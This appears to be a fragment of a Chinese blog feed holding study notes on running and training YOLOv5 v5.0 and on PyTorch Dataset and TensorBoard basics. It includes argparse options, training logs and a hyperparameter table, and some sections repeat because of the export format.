      • IOU:交并比,Intersection over Union
      • NMS:非极大值抑制,Non Max Suppression
      • NMS(non_max_suppression) - 知乎 (zhihu.com)。在预测任务中,会出现很多冗余的预测框。通过NMS操作可以有效的删除冗余检测的结果。非极大值抑制(NMS)顾名思义就是抑制不是极大值的元素,搜索局部的极大值。大于该值的框框将被合并。
    • --device 使用设备,可选 cuda 或 cpu

    • --view-img 预测后是否显示图片

    • --save-txt 预测后会把框框的坐标信息保存到 txt 中

    • --save-conf 预测后将置信度保存到 txt 中

    • --nosave 是否保存预测结果图

    • --classes 设置只保留某一部分类别, 形如 0 或者 0 2 3, 使用 --classes = n, 则在路径 runs/detect/exp*/ 下保存的图片为 n 所对应的类别, 此时需要设置 data

    • --agnostic-nms进行 NMS 去除不同类别之间的框, 默认 False

    • --augment TTA测试时增强/多尺度预测

    • --visualize 是否可视化网络层输出特征

    • --update 如果为True,则对所有模型进行 strip_optimizer 操作,去除pt文件中的优化器等信息,默认为 False

    • --project 保存测试日志的文件夹路径

    • --name 保存测试日志文件夹的名字, 所以最终是保存在 project/name

    • --exist_ok 是否重新创建日志文件, False时重新创建文件

    一点小补充

    opt = parser.parse_args()
    print(opt)

    ​ 这两行代码就是解析之前设置的参数用。

    训练YOLOv5模型(本地)

    ​ 运行 train.py 就可以本地训练 YOLOv5 模型。

    github: skipping check (not a git repository)
    YOLOv5 2021-4-12 torch 1.13.1+cu117 CUDA:0 (NVIDIA GeForce MX330, 4095.875MB)

    Namespace(weights='yolov5s.pt', cfg='', data='data/coco128.yaml', hyp='data/hyp.scratch.yaml', epochs=300, batch_size=16, img_size=[640, 640], rect=False, resume=False, nosave=False, notest=False, noautoanchor=False, evolve=False, bucket='', cache_images=False, image_weights=False, device='', multi_scale=False, single_cls=False, adam=False, sync_bn=False, local_rank=-1, workers=0, project='runs/train', entity=None, name='exp', exist_ok=False, quad=False, linear_lr=False, label_smoothing=0.0, upload_dataset=False, bbox_interval=-1, save_period=-1, artifact_alias='latest', world_size=1, global_rank=-1, save_dir='runs\\train\\exp6', total_batch_size=16)
    tensorboard: Start with 'tensorboard --logdir runs/train', view at http://localhost:6006/
    hyperparameters: lr0=0.01, lrf=0.2, momentum=0.937, weight_decay=0.0005, warmup_epochs=3.0, warmup_momentum=0.8, warmup_bias_lr=0.1, box=0.05, cls=0.5, cls_pw=1.0, obj=1.0, obj_pw=1.0, iou_t=0.2, anchor_t=4.0, fl_gamma=0.0, hsv_h=0.015, hsv_s=0.7, hsv_v=0.4, degrees=0.0, translate=0.1, scale=0.5, shear=0.0, perspective=0.0, flipud=0.0, fliplr=0.5, mosaic=1.0, mixup=0.0
    wandb: Install Weights & Biases for YOLOv5 logging with 'pip install wandb' (recommended)

    from n params module arguments
    0 -1 1 3520 models.common.Focus [3, 32, 3]
    1 -1 1 18560 models.common.Conv [32, 64, 3, 2]
    2 -1 1 18816 models.common.C3 [64, 64, 1]
    3 -1 1 73984 models.common.Conv [64, 128, 3, 2]
    4 -1 1 156928 models.common.C3 [128, 128, 3]
    5 -1 1 295424 models.common.Conv [128, 256, 3, 2]
    6 -1 1 625152 models.common.C3 [256, 256, 3]
    7 -1 1 1180672 models.common.Conv [256, 512, 3, 2]
    8 -1 1 656896 models.common.SPP [512, 512, [5, 9, 13]]
    9 -1 1 1182720 models.common.C3 [512, 512, 1, False]
    10 -1 1 131584 models.common.Conv [512, 256, 1, 1]
    11 -1 1 0 torch.nn.modules.upsampling.Upsample [None, 2, 'nearest']
    12 [-1, 6] 1 0 models.common.Concat [1]
    13 -1 1 361984 models.common.C3 [512, 256, 1, False]
    14 -1 1 33024 models.common.Conv [256, 128, 1, 1]
    15 -1 1 0 torch.nn.modules.upsampling.Upsample [None, 2, 'nearest']
    16 [-1, 4] 1 0 models.common.Concat [1]
    17 -1 1 90880 models.common.C3 [256, 128, 1, False]
    18 -1 1 147712 models.common.Conv [128, 128, 3, 2]
    19 [-1, 14] 1 0 models.common.Concat [1]
    20 -1 1 296448 models.common.C3 [256, 256, 1, False]
    21 -1 1 590336 models.common.Conv [256, 256, 3, 2]
    22 [-1, 10] 1 0 models.common.Concat [1]
    23 -1 1 1182720 models.common.C3 [512, 512, 1, False]
    24 [17, 20, 23] 1 229245 models.yolo.Detect [80, [[10, 13, 16, 30, 33, 23], [30, 61, 62, 45, 59, 119], [116, 90, 156, 198, 373, 326]], [128, 256, 512]]
    C:\Users\gzjzx\anaconda3\lib\site-packages\torch\functional.py:504: UserWarning: torch.meshgrid: in an upcoming release, it will be required to pass the indexing argument. (Triggered internally at C:\actions-runner\_work\pytorch\pytorch\builder\windows\pytorch\aten\src\ATen\native\TensorShape.cpp:3191.)
    return _VF.meshgrid(tensors, **kwargs) # type: ignore[attr-defined]
    Model Summary: 283 layers, 7276605 parameters, 7276605 gradients, 17.2 GFLOPS

    Transferred 362/362 items from yolov5s.pt
    Scaled weight_decay = 0.0005
    Optimizer groups: 62 .bias, 62 conv.weight, 59 other
    train: Scanning '..\coco128\labels\train2017.cache' images and labels... 126 found, 2 missing, 0 empty, 0 corrupted: 100%|██████████| 128/128 [00:00<?, ?it/s]
    Plotting labels...
    val: Scanning '..\coco128\labels\train2017.cache' images and labels... 126 found, 2 missing, 0 empty, 0 corrupted: 100%|██████████| 128/128 [00:00<?, ?it/s]

    autoanchor: Analyzing anchors... anchors/target = 4.26, Best Possible Recall (BPR) = 0.9946
    Image sizes 640 train, 640 test
    Using 0 dataloader workers
    Logging results to runs\train\exp6
    Starting training for 300 epochs...

    Epoch gpu_mem box obj cls total labels img_size
    0/299 3.06G 0.04553 0.06434 0.02053 0.1304 143 640: 100%|██████████| 8/8 [00:46<00:00, 5.79s/it]
    Class Images Labels P R mAP@.5 mAP@.5:.95: 100%|██████████| 4/4 [00:34<00:00, 8.56s/it]
    all 128 929 0.728 0.557 0.648 0.427

    Epoch gpu_mem box obj cls total labels img_size
    1/299 3.29G 0.04573 0.06658 0.02045 0.1328 158 640: 100%|██████████| 8/8 [00:23<00:00, 2.96s/it]
    Class Images Labels P R mAP@.5 mAP@.5:.95: 100%|██████████| 4/4 [00:09<00:00, 2.32s/it]
    all 128 929 0.718 0.566 0.658 0.433

    Epoch gpu_mem box obj cls total labels img_size
    2/299 3.29G 0.04575 0.07487 0.01959 0.1402 213 640: 38%|███▊ | 3/8 [00:15<00:25, 5.00s/it]
    Process finished with exit code -1

    ​ 提示推荐你安装 wandb ,据说是个比 Tensorboard 更好用的可视化工具。


    YOLOv5 的超参文件见 data/hyp.finetune.yaml(适用 VOC 数据集)或者 hyo.scrach.yaml(适用 COCO 数据集)文件。

    名称描述
    lr00.00447学习率
    lrf0.114余弦退火超参数
    momentum0.873学习率动量
    weight_decay0.00047权重衰减系数
    giou0.0306giou 损失的系数
    cls0.211分类损失的系数
    cls_pw0.546分类 BCELoss 中正样本的权重
    obj0.421有无物体损失的系数
    obj_pw0.972有无物体 BCELoss 中正样本的权重
    iou_t0.2标签与 anchors 的 iou 阈值 iou training threshold
    anchor_t2.26标签的长 h 宽 w/anchor 的长 h_a 宽 w_a 阈值, 即 h/h_a, w/w_a 都要在(1/2.26, 2.26)之间 anchor-multiple threshold
    fl_gamma0.0设为 0 则表示不使用 focal loss(efficientDet default is gamma=1.5)
    hsv_h0.0154色调
    hsv_s0.9饱和度
    hsv_v0.619明度
    degrees0.404旋转角度
    translate0.206水平和垂直平移
    scale0.86缩放
    shear0.795剪切
    perspective0.0透视变换参数
    flipud0.00756上下翻转
    fliplr0.5左右翻转
    mixup0.153mixup 系数

    ​ 从 if __name__ == '__main__': 中看到设置的参数:

    parser = argparse.ArgumentParser()
    parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
    parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
    parser.add_argument('--data', type=str, default='data/coco128.yaml', help='data.yaml path')
    parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
    parser.add_argument('--epochs', type=int, default=300)
    parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
    parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')
    parser.add_argument('--rect', action='store_true', help='rectangular training')
    parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
    parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
    parser.add_argument('--notest', action='store_true', help='only test final epoch')
    parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
    parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
    parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
    parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
    parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
    parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
    parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
    parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
    parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
    parser.add_argument('--workers', type=int, default=0, help='maximum number of dataloader workers')
    parser.add_argument('--project', default='runs/train', help='save to project/name')
    parser.add_argument('--entity', default=None, help='W&B entity')
    parser.add_argument('--name', default='exp', help='save to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    parser.add_argument('--quad', action='store_true', help='quad dataloader')
    parser.add_argument('--linear-lr', action='store_true', help='linear LR')
    parser.add_argument('--label-smoothing', type=float, default=0.0, help='Label smoothing epsilon')
    parser.add_argument('--upload_dataset', action='store_true', help='Upload dataset as W&B artifact table')
    parser.add_argument('--bbox_interval', type=int, default=-1, help='Set bounding-box image logging interval for W&B')
    parser.add_argument('--save_period', type=int, default=-1, help='Log model after every "save_period" epoch')
    parser.add_argument('--artifact_alias', type=str, default="latest", help='version of dataset artifact to be used')
    opt = parser.parse_args()

    训练YOLOv5模型(云端GPU)

    ]]>
    + 视频

    仓库

    课程

    课程介绍

    1. 项目介绍及环境配置
    2. 如何利用 YOLOv5 进行预测
    3. 如何训练 YOLOv5 神经网络
    4. 如何制作和训练自己的数据集
    5. 理解预测代码组织和结构
    6. 理解训练代码组织和结构
    7. 带你重写代码(有机会的话)

    项目介绍及环境配置

    从 github 官网上爬取项目。

    为了保证与讲解视频一致,选择 v5.0 版本(是 yolov5 的 5.0 版本,不是 yolo 的 5.0 版本),下载代码时选择 Download ZIP

    查看 README.md

    Python 3.8 or later with all requirements.txt dependencies installed, including torch>=1.7. To install run:

    1
    $ pip install -r requirements.txt

    使用 Pycharm 打开项目,配环境:

    1
    conda create -n yolo python=3.9
    1
    conda activate yolo
    1
    pip install -r requirements.txt

    1. 选择特定 Tags 的文件,以保持和视频中代码的一致
    2. 在 PyCharm 中配置对应的 Conda 环境
    3. 如果作者提供 requirments.txt 文件:
      • 可以利用 PyCharm 自带的智能提示进行安装
      • 或者利用 pip install-r requirements.txt 指令进行安装
    4. 如果作者没有提供 requirments.txt 文件
      • 根据运行报错信息,百度,手动安装缺少的库

    如何利用 YOLOv5 进行预测(一)

    ​ 在 README.md 中可以看到如何导入训练好的模型文件对图像进行预测:

    detect.py runs inference on a variety of sources, downloading models automatically from the latest YOLOv5 release and saving results to runs/detect.

    1
    2
    3
    4
    5
    6
    7
    $ python detect.py --source 0  # webcam
    file.jpg # image
    file.mp4 # video
    path/ # directory
    path/*.jpg # glob
    'https://youtu.be/NUsoVlDFqZg' # YouTube video
    'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP stream

    ​ 官方文档推荐用命令行设置相应的 parser 参数开始预测,但是也可以使用 pycharm 启动。

    ​ 打开 detect.py:

    if __name__ == '__main__': 中会有包 import argparse 中的 parser 参数,通过命令行运行这个文件可以设置这些参数:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
    parser.add_argument('--source', type=str, default='data/images', help='source') # file/folder, 0 for webcam
    parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
    parser.add_argument('--conf-thres', type=float, default=0.25, help='object confidence threshold')
    parser.add_argument('--iou-thres', type=float, default=0.45, help='IOU threshold for NMS')
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--view-img', action='store_true', help='display results')
    parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
    parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
    parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
    parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --class 0, or --class 0 2 3')
    parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
    parser.add_argument('--augment', action='store_true', help='augmented inference')
    parser.add_argument('--update', action='store_true', help='update all models')
    parser.add_argument('--project', default='runs/detect', help='save results to project/name')
    parser.add_argument('--name', default='exp', help='save results to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    opt = parser.parse_args()
    print(opt)
    check_requirements(exclude=('pycocotools', 'thop'))

    with torch.no_grad():
    if opt.update: # update all models (to fix SourceChangeWarning)
    for opt.weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']:
    detect()
    strip_optimizer(opt.weights)
    else:
    detect()

    ​ 运行后会根据 --weights 的默认值 yolov5s.pt 下载模型文件:https://github.com/ultralytics/yoloy5/releases/download/y5.0/yolov5s.pt,也可以换其他的模型:`yolov5m.pt`、`yolov5l.pt`、`yolov5x.pt`。

    png

    ​ 然后根据 --source 的默认值 data/images 读取输入。

    ​ 生成的 --project 的默认值 runs/detect 将预测后的结果保存至相应的文件夹。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    Namespace(weights='yolov5s.pt', source='data/images', img_size=640, conf_thres=0.25, iou_thres=0.45, device='', view_img=False, save_txt=False, save_conf=False, nosave=False, classes=None, agnostic_nms=False, augment=False, update=False, project='runs/detect', name='exp', exist_ok=False)
    YOLOv5 2021-4-12 torch 2.0.0+cpu CPU

    Fusing layers...
    C:\Users\gzjzx\anaconda3\envs\yolo\lib\site-packages\torch\functional.py:504: UserWarning: torch.meshgrid: in an upcoming release, it will be required to pass the indexing argument. (Triggered internally at C:\actions-runner\_work\pytorch\pytorch\builder\windows\pytorch\aten\src\ATen\native\TensorShape.cpp:3484.)
    return _VF.meshgrid(tensors, **kwargs) # type: ignore[attr-defined]
    Model Summary: 224 layers, 7266973 parameters, 0 gradients, 17.0 GFLOPS
    image 1/2 D:\Study\1st-year-master\yolov5-5.0\data\images\bus.jpg: 640x480 4 persons, 1 bus, 1 fire hydrant, Done. (1.685s)
    image 2/2 D:\Study\1st-year-master\yolov5-5.0\data\images\zidane.jpg: 384x640 2 persons, 2 ties, Done. (0.973s)
    Results saved to runs\detect\exp14
    Done. (3.025s)

    jpg

    坑点:

    如何利用 YOLOv5 进行预测(二)

    ​ 这章主要讲了剩下的参数的用法。

    ​ 可以在 pycharm 中的 Edit Configurations...Parameters 中设置参数。

    png

    • --img-size 在导入图片时,会把图片缩放至一定大小的图片作为输入。

    • --conf-thres 置信阈值,只有检测结果大于该阈值的才会在输出中展示。

    • --iou-thres

      • IOU:交并比,Intersection over Union
      • NMS:非极大值抑制,Non Max Suppression
      • NMS(non_max_suppression) - 知乎 (zhihu.com)。在预测任务中,会出现很多冗余的预测框。通过NMS操作可以有效的删除冗余检测的结果。非极大值抑制(NMS)顾名思义就是抑制不是极大值的元素,搜索局部的极大值。大于该值的框框将被合并。
    • --device 使用设备,可选 cuda 或 cpu

    • --view-img 预测后是否显示图片

    • --save-txt 预测后会把框框的坐标信息保存到 txt 中

    • --save-conf 预测后将置信度保存到 txt 中

    • --nosave 是否保存预测结果图

    • --classes 设置只保留某一部分类别, 形如 0 或者 0 2 3, 使用 --classes = n, 则在路径 runs/detect/exp*/ 下保存的图片为 n 所对应的类别, 此时需要设置 data

    • --agnostic-nms进行 NMS 去除不同类别之间的框, 默认 False

    • --augment TTA测试时增强/多尺度预测

    • --visualize 是否可视化网络层输出特征

    • --update 如果为True,则对所有模型进行 strip_optimizer 操作,去除pt文件中的优化器等信息,默认为 False

    • --project 保存测试日志的文件夹路径

    • --name 保存测试日志文件夹的名字, 所以最终是保存在 project/name

    • --exist_ok 是否重新创建日志文件, False时重新创建文件

    一点小补充

    1
    2
    opt = parser.parse_args()
    print(opt)

    ​ 这两行代码就是解析之前设置的参数用。

    训练YOLOv5模型(本地)

    ​ 运行 train.py 就可以本地训练 YOLOv5 模型。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    github: skipping check (not a git repository)
    YOLOv5 2021-4-12 torch 1.13.1+cu117 CUDA:0 (NVIDIA GeForce MX330, 4095.875MB)

    Namespace(weights='yolov5s.pt', cfg='', data='data/coco128.yaml', hyp='data/hyp.scratch.yaml', epochs=300, batch_size=16, img_size=[640, 640], rect=False, resume=False, nosave=False, notest=False, noautoanchor=False, evolve=False, bucket='', cache_images=False, image_weights=False, device='', multi_scale=False, single_cls=False, adam=False, sync_bn=False, local_rank=-1, workers=0, project='runs/train', entity=None, name='exp', exist_ok=False, quad=False, linear_lr=False, label_smoothing=0.0, upload_dataset=False, bbox_interval=-1, save_period=-1, artifact_alias='latest', world_size=1, global_rank=-1, save_dir='runs\\train\\exp6', total_batch_size=16)
    tensorboard: Start with 'tensorboard --logdir runs/train', view at http://localhost:6006/
    hyperparameters: lr0=0.01, lrf=0.2, momentum=0.937, weight_decay=0.0005, warmup_epochs=3.0, warmup_momentum=0.8, warmup_bias_lr=0.1, box=0.05, cls=0.5, cls_pw=1.0, obj=1.0, obj_pw=1.0, iou_t=0.2, anchor_t=4.0, fl_gamma=0.0, hsv_h=0.015, hsv_s=0.7, hsv_v=0.4, degrees=0.0, translate=0.1, scale=0.5, shear=0.0, perspective=0.0, flipud=0.0, fliplr=0.5, mosaic=1.0, mixup=0.0
    wandb: Install Weights & Biases for YOLOv5 logging with 'pip install wandb' (recommended)

    from n params module arguments
    0 -1 1 3520 models.common.Focus [3, 32, 3]
    1 -1 1 18560 models.common.Conv [32, 64, 3, 2]
    2 -1 1 18816 models.common.C3 [64, 64, 1]
    3 -1 1 73984 models.common.Conv [64, 128, 3, 2]
    4 -1 1 156928 models.common.C3 [128, 128, 3]
    5 -1 1 295424 models.common.Conv [128, 256, 3, 2]
    6 -1 1 625152 models.common.C3 [256, 256, 3]
    7 -1 1 1180672 models.common.Conv [256, 512, 3, 2]
    8 -1 1 656896 models.common.SPP [512, 512, [5, 9, 13]]
    9 -1 1 1182720 models.common.C3 [512, 512, 1, False]
    10 -1 1 131584 models.common.Conv [512, 256, 1, 1]
    11 -1 1 0 torch.nn.modules.upsampling.Upsample [None, 2, 'nearest']
    12 [-1, 6] 1 0 models.common.Concat [1]
    13 -1 1 361984 models.common.C3 [512, 256, 1, False]
    14 -1 1 33024 models.common.Conv [256, 128, 1, 1]
    15 -1 1 0 torch.nn.modules.upsampling.Upsample [None, 2, 'nearest']
    16 [-1, 4] 1 0 models.common.Concat [1]
    17 -1 1 90880 models.common.C3 [256, 128, 1, False]
    18 -1 1 147712 models.common.Conv [128, 128, 3, 2]
    19 [-1, 14] 1 0 models.common.Concat [1]
    20 -1 1 296448 models.common.C3 [256, 256, 1, False]
    21 -1 1 590336 models.common.Conv [256, 256, 3, 2]
    22 [-1, 10] 1 0 models.common.Concat [1]
    23 -1 1 1182720 models.common.C3 [512, 512, 1, False]
    24 [17, 20, 23] 1 229245 models.yolo.Detect [80, [[10, 13, 16, 30, 33, 23], [30, 61, 62, 45, 59, 119], [116, 90, 156, 198, 373, 326]], [128, 256, 512]]
    C:\Users\gzjzx\anaconda3\lib\site-packages\torch\functional.py:504: UserWarning: torch.meshgrid: in an upcoming release, it will be required to pass the indexing argument. (Triggered internally at C:\actions-runner\_work\pytorch\pytorch\builder\windows\pytorch\aten\src\ATen\native\TensorShape.cpp:3191.)
    return _VF.meshgrid(tensors, **kwargs) # type: ignore[attr-defined]
    Model Summary: 283 layers, 7276605 parameters, 7276605 gradients, 17.2 GFLOPS

    Transferred 362/362 items from yolov5s.pt
    Scaled weight_decay = 0.0005
    Optimizer groups: 62 .bias, 62 conv.weight, 59 other
    train: Scanning '..\coco128\labels\train2017.cache' images and labels... 126 found, 2 missing, 0 empty, 0 corrupted: 100%|██████████| 128/128 [00:00<?, ?it/s]
    Plotting labels...
    val: Scanning '..\coco128\labels\train2017.cache' images and labels... 126 found, 2 missing, 0 empty, 0 corrupted: 100%|██████████| 128/128 [00:00<?, ?it/s]

    autoanchor: Analyzing anchors... anchors/target = 4.26, Best Possible Recall (BPR) = 0.9946
    Image sizes 640 train, 640 test
    Using 0 dataloader workers
    Logging results to runs\train\exp6
    Starting training for 300 epochs...

    Epoch gpu_mem box obj cls total labels img_size
    0/299 3.06G 0.04553 0.06434 0.02053 0.1304 143 640: 100%|██████████| 8/8 [00:46<00:00, 5.79s/it]
    Class Images Labels P R mAP@.5 mAP@.5:.95: 100%|██████████| 4/4 [00:34<00:00, 8.56s/it]
    all 128 929 0.728 0.557 0.648 0.427

    Epoch gpu_mem box obj cls total labels img_size
    1/299 3.29G 0.04573 0.06658 0.02045 0.1328 158 640: 100%|██████████| 8/8 [00:23<00:00, 2.96s/it]
    Class Images Labels P R mAP@.5 mAP@.5:.95: 100%|██████████| 4/4 [00:09<00:00, 2.32s/it]
    all 128 929 0.718 0.566 0.658 0.433

    Epoch gpu_mem box obj cls total labels img_size
    2/299 3.29G 0.04575 0.07487 0.01959 0.1402 213 640: 38%|███▊ | 3/8 [00:15<00:25, 5.00s/it]
    Process finished with exit code -1

    ​ 提示推荐你安装 wandb ,据说是个比 Tensorboard 更好用的可视化工具。


    YOLOv5 的超参文件见 data/hyp.finetune.yaml(适用 VOC 数据集)或者 hyo.scrach.yaml(适用 COCO 数据集)文件。

    名称描述
    lr00.00447学习率
    lrf0.114余弦退火超参数
    momentum0.873学习率动量
    weight_decay0.00047权重衰减系数
    giou0.0306giou 损失的系数
    cls0.211分类损失的系数
    cls_pw0.546分类 BCELoss 中正样本的权重
    obj0.421有无物体损失的系数
    obj_pw0.972有无物体 BCELoss 中正样本的权重
    iou_t0.2标签与 anchors 的 iou 阈值 iou training threshold
    anchor_t2.26标签的长 h 宽 w/anchor 的长 h_a 宽 w_a 阈值, 即 h/h_a, w/w_a 都要在(1/2.26, 2.26)之间 anchor-multiple threshold
    fl_gamma0.0设为 0 则表示不使用 focal loss(efficientDet default is gamma=1.5)
    hsv_h0.0154色调
    hsv_s0.9饱和度
    hsv_v0.619明度
    degrees0.404旋转角度
    translate0.206水平和垂直平移
    scale0.86缩放
    shear0.795剪切
    perspective0.0透视变换参数
    flipud0.00756上下翻转
    fliplr0.5左右翻转
    mixup0.153mixup 系数

    ​ 从 if __name__ == '__main__': 中看到设置的参数:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    parser = argparse.ArgumentParser()
    parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
    parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
    parser.add_argument('--data', type=str, default='data/coco128.yaml', help='data.yaml path')
    parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
    parser.add_argument('--epochs', type=int, default=300)
    parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
    parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')
    parser.add_argument('--rect', action='store_true', help='rectangular training')
    parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
    parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
    parser.add_argument('--notest', action='store_true', help='only test final epoch')
    parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
    parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
    parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
    parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
    parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
    parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
    parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
    parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
    parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
    parser.add_argument('--workers', type=int, default=0, help='maximum number of dataloader workers')
    parser.add_argument('--project', default='runs/train', help='save to project/name')
    parser.add_argument('--entity', default=None, help='W&B entity')
    parser.add_argument('--name', default='exp', help='save to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    parser.add_argument('--quad', action='store_true', help='quad dataloader')
    parser.add_argument('--linear-lr', action='store_true', help='linear LR')
    parser.add_argument('--label-smoothing', type=float, default=0.0, help='Label smoothing epsilon')
    parser.add_argument('--upload_dataset', action='store_true', help='Upload dataset as W&B artifact table')
    parser.add_argument('--bbox_interval', type=int, default=-1, help='Set bounding-box image logging interval for W&B')
    parser.add_argument('--save_period', type=int, default=-1, help='Log model after every "save_period" epoch')
    parser.add_argument('--artifact_alias', type=str, default="latest", help='version of dataset artifact to be used')
    opt = parser.parse_args()

    训练YOLOv5模型(云端GPU)

    ]]>
    @@ -7492,7 +7492,7 @@ /posts/Pytorch-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%BF%AB%E9%80%9F%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8B%EF%BC%88%E7%BB%9D%E5%AF%B9%E9%80%9A%E4%BF%97%E6%98%93%E6%87%82%EF%BC%81%EF%BC%89%E3%80%90%E5%B0%8F%E5%9C%9F%E5%A0%86%E3%80%91/ - 视频

    课程

    Python 学习中的两大法宝函数(当然也可以用在 PyTorch)

    from torch.utils.data import Dataset
    help(Dataset)
    Dataset??

    PyTorch 加载数据初认识

    Pytorch 有两个类:

    • Dataset: 提供一种方式去获取数据及其标签
      • 如何获取每一个数据及其标签
      • 告诉我们总共有多少数据
    • Dataloader: 为后面的网络提供不同的数据形式

    Dataset 类代码实战

    png

    ​ 下载了数据包,是一个蚂蚁和蜜蜂的二分类问题。训练集根目录为 dataset/train,标签有 antsbees

    ​ 设计一个类 MyData,负责读取数据集:

    from torch.utils.data import Dataset
    from PIL import Image
    import os

    class MyData(Dataset):

    def __init__(self, root_dir, label_dir):
    """
    初始化
    :param root_dir: 根目录
    :param label_dir: 标签目录
    """
    self.root_dir = root_dir
    self.label_dir = label_dir
    self.path = os.path.join(self.root_dir, self.label_dir)
    self.img_path = os.listdir(self.path)

    def __getitem__(self, idx):
    """
    获取对象
    :param idx: 索引
    :return:
    """
    img_name = self.img_path[idx]
    img_item_path = os.path.join(self.root_dir, self.label_dir, img_name)
    img = Image.open(img_item_path)
    label = self.label_dir
    return img, label

    def __len__(self):
    return len(self.img_path)


    root_dir = "dataset/train"
    ants_label_dir = "ants"
    bees_label_dir = "bees"
    ants_dataset = MyData(root_dir, ants_label_dir)
    bees_dataset = MyData(root_dir, bees_label_dir)

    TensorBoard 的使用(一)

    使用 pytorch 的 tensorboard 在网页端显示函数图像 $y=2x$:

    from torch.utils.tensorboard import SummaryWriter

    writer = SummaryWriter("logs")

    for i in range(100):
    writer.add_scalar("y=2x", 2 * i, i)

    writer.close()

    在 shell 端口中 tensorboard --logdir=logs:(启动 tensorboard,logdir 目录为 logs

    PS D:\Study\1st-year-master\XiaoTuDui\Test> tensorboard --logdir=logs
    Serving TensorBoard on localhost; to expose to the network, use a proxy or pass --bind_all
    TensorBoard 2.9.1 at http://localhost:6006/ (Press CTRL+C to quit)

    png

    如果两段 writer.add_scalar 名称相同,可能会出现一张图像混合形成两张图像的情况,可以考虑清除项目中 logs/ 的缓存刷新。

    TensorBoard 的使用(二)

    主要讲了 writer.add_image 的用法。

    def add_image(    self, tag, img_tensor, global_step=None, walltime=None, dataformats="CHW"):    """Add image data to summary.    Note that this requires the ``pillow`` package.                                        Args:        tag (str): Data identifier        img_tensor (torch.Tensor, numpy.ndarray, or string/blobname): Image data        global_step (int): Global step value to record        walltime (float): Optional override default walltime (time.time())          seconds after epoch of event        dataformats (str): Image data format specification of the form          CHW, HWC, HW, WH, etc.    Shape:        img_tensor: Default is :math:`(3, H, W)`. You can use ``torchvision.utils.make_grid()`` to        convert a batch of tensor into 3xHxW format or call ``add_images`` and let us do the job.        Tensor with :math:`(1, H, W)`, :math:`(H, W)`, :math:`(H, W, 3)` is also suitable as long as        corresponding ``dataformats`` argument is passed, e.g. ``CHW``, ``HWC``, ``HW``.                                        Examples::                                            from torch.utils.tensorboard import SummaryWriter        import numpy as np        img = np.zeros((3, 100, 100))        img[0] = np.arange(0, 